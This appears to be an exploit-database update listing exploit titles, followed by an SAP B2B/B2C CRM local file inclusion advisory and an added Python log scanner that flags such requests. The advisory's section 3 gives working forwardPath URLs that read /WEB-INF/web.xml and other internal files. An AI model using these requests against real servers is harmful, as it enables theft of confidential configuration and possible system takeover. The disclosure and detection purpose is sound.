
12 changes to exploits/shellcodes

Microsoft Edge - 'Array.filter' Info Leak
Microsoft Edge - 'Array.filter' Information Leak
Microsoft Edge Chakra JIT - Bound Check Elimination Bug
Windows - Local Privilege Escalation
Windows WMI - Recieve Notification Exploit (Metasploit)
Microsoft Windows - Local Privilege Escalation
Microsoft Windows WMI - Recieve Notification Exploit (Metasploit)
Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)
Prime95 29.4b8 - Stack Buffer Overflow (SEH)
DynoRoot DHCP - Client Command Injection
Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)
Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution
Microsoft Edge (Windows 10) - 'chakra.dll' Information Leak / Type Confusion Remote Code Execution
Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)
HPE iMC 7.3 - Remote Code Execution (Metasploit)
Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Monstra CMS before 3.0.4 - Cross-Site Scripting
SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure
Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery
Cisco SA520W Security Appliance - Path Traversal
SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
# Title: SAP B2B / B2C CRM 2.x < 4.x - Local File Inclusion
# Application: SAP B2B OR B2C is CRM
# Versions Affected: SAP B2B OR B2C is CRM 2.x, 3.x and 4.x with Backend R/3 (to icss_b2b)
# Vendor URL: http://SAP.com
# Bugs: SAP LFI in B2B OR B2C CRM
# Sent: 2018-05-03
# Reported: 2018-05-03
# Date of Public Advisory: 2018-02-09
# Reference: SAP Security Note 1870255656
# Author: Richard Alviarez

# 1. VULNERABLE PACKAGES
# SAP LFI in B2B OR B2C CRM v2.x to 4.x
# Other versions are probably affected too, but they were not checked.

# 2. TECHNICAL DESCRIPTION
# An attacker can take advantage of this vulnerability
# to obtain confidential information from the platform,
# and may also be able to write to the logs of the
# registry in order to achieve remote command execution and take control of the system.

# 3. Steps to exploit this vulnerability

A. Open the following page on the SAP server:
https://SAP/{name}_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml

Other vulnerable parameters:

https://SAP/{name}_b2b/CatalogClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/IbaseSearchClean.do?forwardPath=/WEB-INF/web.xml
https://SAP/{name}_b2b/ForwardDynamic.do?forwardPath=/WEB-INF/web.xml

B. Replace the {name} placeholder with, for example, icss_b2b or another name.

C. Replace "/WEB-INF/web.xml" with other internal files or archives.

# 4. Collaborators
# - CuriositySec
# - aDoN90
# - Vis0r
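
Detection example added here (not part of the original advisory or of any SAP code): a Python check that scans web access logs for the requests described in section 3, that is, *.do requests whose forwardPath parameter resolves to a protected location such as /WEB-INF/ after percent-decoding. The log lines are constructed samples, and the function names, the blocked-segment list and the benign paths are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (Common Log Format); addresses, times and sizes are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [03/May/2018:10:00:01 +0000] "GET /icss_b2b/initProductCatalog.do?forwardPath=/WEB-INF/web.xml HTTP/1.1" 200 5120
10.0.0.7 - - [03/May/2018:10:00:09 +0000] "GET /icss_b2b/CatalogClean.do?forwardPath=%252FWEB-INF%252Fweb.xml HTTP/1.1" 200 5120
10.0.0.3 - - [03/May/2018:10:02:30 +0000] "GET /icss_b2b/initProductCatalog.do?forwardPath=/catalog/entry.jsp HTTP/1.1" 200 8841
10.0.0.3 - - [03/May/2018:10:02:31 +0000] "GET /icss_b2b/b2b/init.do HTTP/1.1" 200 4410
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
BLOCKED_SEGMENTS = {"..", "web-inf", "meta-inf"}  # assumed never to be valid forward targets


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_forward_path(target):
    """Return the decoded forwardPath when it names a protected location, else None."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".do"):
        return None
    for raw in parse_qs(parts.query).get("forwardPath", []):
        decoded = fully_decode(raw)
        segments = decoded.replace("\\", "/").lower().split("/")
        if BLOCKED_SEGMENTS.intersection(segments):
            return decoded
    return None


def scan(log_text):
    """Return (client, status, decoded forwardPath) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match:
            decoded = suspicious_forward_path(match.group(1))
            if decoded is not None:
                hits.append((line.split()[0], int(match.group(2)), decoded))
    return hits


if __name__ == "__main__":
    for client, status, path in scan(SAMPLE_LOG):
        print(f"{client} status={status} forwardPath={path}")
```

A flagged request that returned status 200 is the case to triage first, since the server answered it rather than rejecting it.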